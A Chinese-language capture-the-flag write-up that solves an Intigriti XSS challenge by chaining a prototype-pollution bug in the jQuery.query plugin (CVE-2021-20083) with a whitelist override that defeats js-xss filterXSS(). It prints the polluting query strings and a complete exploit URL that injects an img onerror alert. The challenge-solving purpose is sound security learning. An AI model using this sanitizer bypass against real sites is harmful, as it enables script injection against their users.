晚上刷到Intigriti最近的一个XSS挑战,考察Prototype Pollution和通过Prototype Pollution来绕过filterXSS()两个点,题目流畅可玩性高,当然这就是后话了-_-
进入正题:
https://challenge-0522.intigriti.io/challenge/challenge.html?page=1
右键源码,寻找利用点
可以看到有一个pages列表参数,里面存储了三个页面和跳转路由,然后通过url的page参数来实现页面跳转,在传入page参数的时候进行了一次filterXSS()。
<script>
var pages = {
1: `HOME
<h5>Pollution is consuming the world. It's killing all the plants and ruining nature, but we won't let that happen! Our products will help you save the planet and yourself by purifying air naturally.</h5>`,
2: `PRODUCTS
<br>
<footer>
<img src="https://miro.medium.com/max/1000/1*Cd9sLiby5ibLJAkixjCidw.jpeg" width="150" height="200" alt="Snake Plant"></img><span>Snake Plant</span>
</footer>
<footer>
<img src="https://miro.medium.com/max/1000/1*wlzwrBXYoDDkaAag_CT-AA.jpeg" width="150" height="200" alt="Areca Palm"></img><span>Areca Palm</span>
</footer>
<footer>
<img src="https://miro.medium.com/max/1000/1*qn_6G8NV4xg_J0luFbY47w.jpeg" width="150" height="200" alt="Rubber Plant"></img><span>Rubber Plant</span>
</footer>`,
3: `CONTACT
<br><br>
<b>
<a href="https://www.facebook.com/intigriticom/"><img src="https://cdn-icons-png.flaticon.com/512/124/124010.png" width="50" height="50" alt="Facebook"></img></a>
<a href="https://www.linkedin.com/company/intigriti/"><img src="https://cdn-icons-png.flaticon.com/512/61/61109.png" width="50" height="50" alt="LinkedIn"></img></a>
<a href="https://twitter.com/intigriti"><img src="https://cdn-icons-png.flaticon.com/512/124/124021.png" width="50" height="50" alt="Twitter"></img></a>
<a href="https://www.instagram.com/hackwithintigriti/"><img src="https://cdn-icons-png.flaticon.com/512/174/174855.png" width="50" height="50" alt="Instagram"></img></a>
</b>
`,
4: `
<div class="dropdown">
<div id="myDropdown" class="dropdown-content">
<a href = "?page=1">Home</a>
<a href = "?page=2">Products</a>
<a href = "?page=3">Contact</a>
</div>
</div>`
};
var pl = $.query.get('page');
if(pages[pl] != undefined){
console.log(pages);
document.getElementById("root").innerHTML = pages['4']+filterXSS(pages[pl]);
}else{
document.location.search = "?page=1"
}
</script>
看到这里,应该可以想到大概的解题思路,找方法将<script>alert(document.domain)</script> bypass filterXSS()添加进pages列表中,实现跳转到对应页面时完成弹窗。
但是这个pages是写死的,那如何添加到pages中可能就需要从页面中引入的3个js文件中找漏洞了。
<script src="https://cdnjs.cloudflare.com/ajax/libs/js-xss/0.3.3/xss.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.js"></script>
<script>
/**
* jQuery.query - Query String Modification and Creation for jQuery
分别来看下这三个js文件,分别是:
js-xss 0.3.3:根据白名单过滤HTML(防止XSS攻击) https://jsxss.com/zh/index.html
jquery-3.5.1:最新版本
jQuery.query :Query String Modification and Creation for jQuery
jquery是最新版本,有漏洞的几率不大,所以要从jQuery.query插件入手了。搜一下,可以发现2.2.3版本上有个Prototype Pollution 漏洞(CVE-2021-20083)。
关于什么是Prototype Pollution漏洞,参考
《深入理解 JavaScript Prototype 污染攻击》https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html
这里就不重复了。
继续google找到poc
?__proto__[test]=test
#__proto__[test]=test
测试一下,污染成功,将内容写进去了
可以看到标签<h1>可以执行,但是其它poc却被filter了,接下来就要尝试去绕过js-xss。
找到一个poc,原理在这
https://www.4hou.com/index.php/posts/mG5E
?__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src
<script src="https://cdnjs.cloudflare.com/ajax/libs/js-xss/0.3.3/xss.min.js"></script>
<script>
Object.prototype.whiteList = {img: ['onerror', 'src']}
</script>
<script>
document.write(filterXSS('<img src onerror=alert(1)>'))
</script>
试着绕过一下
https://challenge-0522.intigriti.io/challenge/challenge.html?page=test&__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src&__proto__[test]=%3Cimg%20src%20onerror%3Dalert(1)%3E
Bingo!
原文始发于微信公众号(电驭叛客):Prototype Pollution 和绕过 filterXSS()
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论